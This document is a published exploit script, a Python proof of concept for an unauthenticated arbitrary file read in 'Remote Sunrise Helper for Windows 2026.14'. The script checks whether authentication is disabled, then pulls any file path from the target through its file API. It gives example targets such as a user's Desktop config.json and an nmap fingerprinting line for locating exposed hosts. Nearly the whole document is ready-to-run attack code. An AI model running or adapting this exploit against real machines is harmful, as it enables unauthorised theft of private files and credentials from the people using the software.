📄 Remote Sunrise Helper for Windows 2026.14 Arbitrary File Read

#!/usr/bin/env python3
    # Exploit Title: Remote Sunrise Helper for Windows 2026.14 - Unauthenticated File Read
    # Date: 2026-04-20
    # Exploit Author: Chokri Hammedi
    # Software: https://rs.ltd/latest.php?os=win
    # Vendor: https://rs.ltd/
    # Version: 2026.14
    # Tested on: Windows 10 / Windows 11
    
    import requests, json, sys, urllib3
    urllib3.disable_warnings()
    
    if len(sys.argv) < 3:
        print(f"Usage: {sys.argv[0]} <target_ip> <file_path>")
        print(f"Example: {sys.argv[0]} 192.168.1.103
    'C:/Windows/System32/drivers/etc/hosts'")
        print(f"Example: {sys.argv[0]} 192.168.1.103
    '%%USERPROFILE%%/Desktop/config.json'")
        sys.exit(1)
    
    target = sys.argv[1]
    filepath = sys.argv[2].replace("\\", "/")
    url = f"https://{target}:49762"
    headers = {"X-HostName": "a", "X-ClientToken": "a", "X-HostFullModel": "a"}
    
    r = requests.get(f"{url}/api/getVersion", verify=False, timeout=5)
    data = r.json()
    
    if data.get("requires.auth") == False:
        encoded = filepath.replace("%", "%25")
        r = requests.get(f"{url}/api/getFile={encoded}", headers=headers,
    verify=False)
        file_data = json.loads(r.text)
    
        if "UUID" in file_data:
            uuid = file_data["UUID"]
            http_port = data.get("http.port", 49763)
            r2 = requests.get(f"http://{target}:{http_port}/files/{uuid}/{filepath.split('/')[-1]}",
    timeout=5)
            print(r2.text)
        else:
            print(json.dumps(file_data, indent=2))
    else:
        print("[*] Not vulnerable - authentication required")
    
    
    
    # Additional researcher notes
    
    Identification:
    nmap -p- -T4 <target> --script ssl-cert
    Look for SSL cert with subject: CN=SecureHTTPServer/O=Evgeny Cherpak/C=US